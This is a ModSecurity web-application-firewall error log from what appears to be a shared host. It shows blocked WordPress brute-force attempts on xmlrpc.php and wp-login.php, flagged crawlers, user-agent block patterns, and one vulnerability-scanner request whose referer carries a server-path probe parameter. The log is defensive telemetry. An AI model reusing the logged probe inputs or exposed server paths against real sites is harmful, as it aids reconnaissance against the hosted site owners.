[Tue May 26 17:08:14.609427 2026] [security2:error] [pid 860158:tid 860346] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGJoYFlz_JJsUnscKZtgAAAL8"]
[Tue May 26 17:08:16.238303 2026] [security2:error] [pid 860158:tid 860356] [client 185.242.177.19:58512] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "cti.hn"] [uri "/"] [unique_id "ahWGKIYFlz_JJsUnscKZ2AAAAMk"]
[Tue May 26 17:08:16.769042 2026] [security2:error] [pid 860158:tid 860389] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGKIYFlz_JJsUnscKZ3QAAAOo"]
[Tue May 26 17:08:17.215907 2026] [security2:error] [pid 860158:tid 860401] [client 74.7.230.46:34310] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "billing.mosykay.com"] [uri "/robots.txt"] [unique_id "ahWGKYYFlz_JJsUnscKZ7AAA9jI"]
[Tue May 26 17:08:18.194823 2026] [security2:error] [pid 860158:tid 860341] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGKYYFlz_JJsUnscKZ-QAAALo"]
[Tue May 26 17:08:18.644247 2026] [security2:error] [pid 860158:tid 860339] [client 203.194.101.7:55594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGKoYFlz_JJsUnscKaEwAAALg"]
[Tue May 26 17:08:18.644772 2026] [security2:error] [pid 860158:tid 860339] [client 203.194.101.7:55594] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGKoYFlz_JJsUnscKaEwAAALg"]
[Tue May 26 17:08:20.510981 2026] [security2:error] [pid 860158:tid 860303] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGLIYFlz_JJsUnscKaNAAAAJQ"]
[Tue May 26 17:08:22.684063 2026] [security2:error] [pid 860158:tid 860397] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGLoYFlz_JJsUnscKaYgAAAPI"]
[Tue May 26 17:08:23.656338 2026] [security2:error] [pid 860158:tid 860312] [client 85.8.130.6:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWGLoYFlz_JJsUnscKaYwAAnU8"]
[Tue May 26 17:08:23.927820 2026] [security2:error] [pid 860158:tid 860359] [client 103.174.5.177:36121] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWGLoYFlz_JJsUnscKadAAAAMw"]
[Tue May 26 17:08:24.707975 2026] [security2:error] [pid 860158:tid 860252] [remote 45.55.33.147:36350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.33.55.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWGMIYFlz_JJsUnscKalAAA4l0"]
[Tue May 26 17:08:25.452257 2026] [security2:error] [pid 860158:tid 860305] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGMYYFlz_JJsUnscKapgAAAJY"]
[Tue May 26 17:08:27.285103 2026] [security2:error] [pid 860158:tid 860323] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGMoYFlz_JJsUnscKa4gAAAKg"]
[Tue May 26 17:08:29.099793 2026] [security2:error] [pid 860158:tid 860413] [client 203.194.101.7:55929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGNIYFlz_JJsUnscKbDQAAAQI"]
[Tue May 26 17:08:29.099947 2026] [security2:error] [pid 860158:tid 860413] [client 203.194.101.7:55929] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGNIYFlz_JJsUnscKbDQAAAQI"]
[Tue May 26 17:08:29.228448 2026] [security2:error] [pid 860158:tid 860340] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGNIYFlz_JJsUnscKbCgAAALk"]
[Tue May 26 17:08:31.668529 2026] [security2:error] [pid 860158:tid 860320] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGN4YFlz_JJsUnscKbOAAAAKU"]
[Tue May 26 17:08:32.152012 2026] [security2:error] [pid 860158:tid 860311] [client 113.177.131.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGN4YFlz_JJsUnscKbSAAAAJw"]
[Tue May 26 17:08:32.742333 2026] [security2:error] [pid 860158:tid 860274] [remote 54.39.6.61:21676] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "yourstorybag.com"] [uri "/robots.txt"] [unique_id "ahWGOIYFlz_JJsUnscKbXgAA6XM"]
[Tue May 26 17:08:32.742545 2026] [security2:error] [pid 860158:tid 860388] [client 54.39.6.61:21676] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "yourstorybag.com"] [uri "/robots.txt"] [unique_id "ahWGOIYFlz_JJsUnscKbXgAA6XM"]
[Tue May 26 17:08:33.173685 2026] [security2:error] [pid 860158:tid 860368] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGOIYFlz_JJsUnscKbYQAAANU"]
[Tue May 26 17:08:34.264661 2026] [security2:error] [pid 860158:tid 860277] [remote 15.235.96.111:53860] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "yourstorybag.com"] [uri "/"] [unique_id "ahWGOoYFlz_JJsUnscKbeAAA1nY"]
[Tue May 26 17:08:34.264801 2026] [security2:error] [pid 860158:tid 860369] [client 15.235.96.111:53860] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "yourstorybag.com"] [uri "/"] [unique_id "ahWGOoYFlz_JJsUnscKbeAAA1nY"]
[Tue May 26 17:08:35.925695 2026] [security2:error] [pid 860158:tid 860292] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGO4YFlz_JJsUnscKblgAAAIk"]
[Tue May 26 17:08:35.997027 2026] [security2:error] [pid 860158:tid 860371] [client 78.47.173.76:35828] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWGO4YFlz_JJsUnscKbogAAANg"], referer: http://ucdc.co.in/
[Tue May 26 17:08:38.206239 2026] [security2:error] [pid 860158:tid 860289] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGPYYFlz_JJsUnscKbzQAAAIY"]
[Tue May 26 17:08:39.309472 2026] [security2:error] [pid 860158:tid 860332] [client 203.194.101.7:56268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGP4YFlz_JJsUnscKb7wAAALE"]
[Tue May 26 17:08:39.309614 2026] [security2:error] [pid 860158:tid 860332] [client 203.194.101.7:56268] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGP4YFlz_JJsUnscKb7wAAALE"]
[Tue May 26 17:08:40.421908 2026] [security2:error] [pid 860158:tid 860363] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGP4YFlz_JJsUnscKcAAAAANA"]
[Tue May 26 17:08:41.432171 2026] [security2:error] [pid 860158:tid 860379] [client 185.251.19.136:22577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWGQYYFlz_JJsUnscKcFAAAAOA"]
[Tue May 26 17:08:41.969687 2026] [security2:error] [pid 860158:tid 860368] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGQYYFlz_JJsUnscKcIAAAANU"]
[Tue May 26 17:08:44.051469 2026] [security2:error] [pid 860158:tid 860321] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGQ4YFlz_JJsUnscKcTAAAAKY"]
[Tue May 26 17:08:46.964775 2026] [security2:error] [pid 860158:tid 860350] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGRoYFlz_JJsUnscKcrAAAAMM"]
[Tue May 26 17:08:47.920795 2026] [security2:error] [pid 860158:tid 860266] [remote 74.7.241.58:53150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWGR4YFlz_JJsUnscKc8AAAwWs"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:08:48.391018 2026] [security2:error] [pid 860158:tid 860301] [client 74.7.228.31:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.billing.mosykay.com"] [uri "/robots.txt"] [unique_id "ahWGSIYFlz_JJsUnscKc-AAAAJI"]
[Tue May 26 17:08:48.400244 2026] [security2:error] [pid 860158:tid 860375] [client 74.7.228.31:35788] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.billing.mosykay.com"] [uri "/robots.txt"] [unique_id "ahWGSIYFlz_JJsUnscKc9gAA3HA"]
[Tue May 26 17:08:48.512772 2026] [security2:error] [pid 860158:tid 860340] [client 193.37.33.140:59141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWGSIYFlz_JJsUnscKc9AAAALk"]
[Tue May 26 17:08:48.887731 2026] [security2:error] [pid 860158:tid 860399] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGSIYFlz_JJsUnscKc_gAAAPQ"]
[Tue May 26 17:08:49.688974 2026] [security2:error] [pid 860158:tid 860317] [client 203.194.101.7:56596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGSYYFlz_JJsUnscKdHgAAAKI"]
[Tue May 26 17:08:49.689097 2026] [security2:error] [pid 860158:tid 860317] [client 203.194.101.7:56596] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGSYYFlz_JJsUnscKdHgAAAKI"]
[Tue May 26 17:08:50.716213 2026] [security2:error] [pid 860158:tid 860348] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGSoYFlz_JJsUnscKdMwAAAME"]
[Tue May 26 17:08:51.552424 2026] [core:crit] [pid 860158:tid 860326] (13)Permission denied: [client 192.71.142.134:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:08:54.525265 2026] [security2:error] [pid 860158:tid 860295] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGToYFlz_JJsUnscKdmgAAAIw"]
[Tue May 26 17:08:55.486920 2026] [security2:error] [pid 860158:tid 860296] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGT4YFlz_JJsUnscKdsQAAAI0"]
[Tue May 26 17:08:56.880844 2026] [security2:error] [pid 860158:tid 860413] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGUIYFlz_JJsUnscKdzgAAAQI"]
[Tue May 26 17:08:58.998016 2026] [security2:error] [pid 860158:tid 860385] [client 17.241.219.131:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWGUYYFlz_JJsUnscKd4AAAAOY"]
[Tue May 26 17:08:59.590078 2026] [security2:error] [pid 860158:tid 860410] [client 103.174.5.177:60882] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWGUoYFlz_JJsUnscKd-gAAAP8"]
[Tue May 26 17:08:59.762882 2026] [security2:error] [pid 860158:tid 860351] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGU4YFlz_JJsUnscKeDQAAAMQ"]
[Tue May 26 17:08:59.966131 2026] [security2:error] [pid 860158:tid 860366] [client 17.241.227.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWGU4YFlz_JJsUnscKeHgAAANM"]
[Tue May 26 17:09:00.108787 2026] [security2:error] [pid 860158:tid 860413] [client 203.194.101.7:56939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGVIYFlz_JJsUnscKeJQAAAQI"]
[Tue May 26 17:09:00.108882 2026] [security2:error] [pid 860158:tid 860413] [client 203.194.101.7:56939] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGVIYFlz_JJsUnscKeJQAAAQI"]
[Tue May 26 17:09:00.403444 2026] [security2:error] [pid 860158:tid 860339] [client 189.157.172.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGU4YFlz_JJsUnscKeIQAAALg"]
[Tue May 26 17:09:01.160393 2026] [security2:error] [pid 860158:tid 860326] [client 17.241.227.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWGVYYFlz_JJsUnscKeQQAAAKs"]
[Tue May 26 17:09:01.977073 2026] [security2:error] [pid 860158:tid 860349] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGVYYFlz_JJsUnscKeTQAAAMI"]
[Tue May 26 17:09:03.094934 2026] [security2:error] [pid 860158:tid 860369] [client 185.191.171.3:57574] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/day/2022-08-15/"] [unique_id "ahWGV4YFlz_JJsUnscKecwAAANY"]
[Tue May 26 17:09:03.095095 2026] [security2:error] [pid 860158:tid 860369] [client 185.191.171.3:57574] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/day/2022-08-15/"] [unique_id "ahWGV4YFlz_JJsUnscKecwAAANY"]
[Tue May 26 17:09:05.130106 2026] [security2:error] [pid 860158:tid 860396] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGWIYFlz_JJsUnscKekgAAAPE"]
[Tue May 26 17:09:06.640196 2026] [security2:error] [pid 860158:tid 860293] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGWoYFlz_JJsUnscKe3wAAAIo"]
[Tue May 26 17:09:08.354548 2026] [security2:error] [pid 860158:tid 860325] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGW4YFlz_JJsUnscKfDAAAAKo"]
[Tue May 26 17:09:10.139748 2026] [security2:error] [pid 860158:tid 860377] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGXYYFlz_JJsUnscKfOQAAAN4"]
[Tue May 26 17:09:10.707190 2026] [security2:error] [pid 860158:tid 860296] [client 74.7.244.33:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "webmail.glorodbalsa.com"] [uri "/___proxy_subdomain_webmail/cgi-sys/404.html"] [unique_id "ahWGXoYFlz_JJsUnscKfVgAAAI0"]
[Tue May 26 17:09:10.707850 2026] [security2:error] [pid 860158:tid 860307] [client 74.7.244.33:47478] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "webmail.glorodbalsa.com"] [uri "/___proxy_subdomain_webmail/robots.txt"] [unique_id "ahWGXoYFlz_JJsUnscKfVAAAmFs"]
[Tue May 26 17:09:10.739594 2026] [security2:error] [pid 860158:tid 860288] [client 203.194.101.7:57271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGXoYFlz_JJsUnscKfUwAAAIU"]
[Tue May 26 17:09:10.739764 2026] [security2:error] [pid 860158:tid 860288] [client 203.194.101.7:57271] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGXoYFlz_JJsUnscKfUwAAAIU"]
[Tue May 26 17:09:10.931409 2026] [security2:error] [pid 860158:tid 860260] [remote 193.42.61.12:45242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWGXoYFlz_JJsUnscKfWAAAwWU"]
[Tue May 26 17:09:11.987867 2026] [security2:error] [pid 860158:tid 860366] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGX4YFlz_JJsUnscKfcwAAANM"]
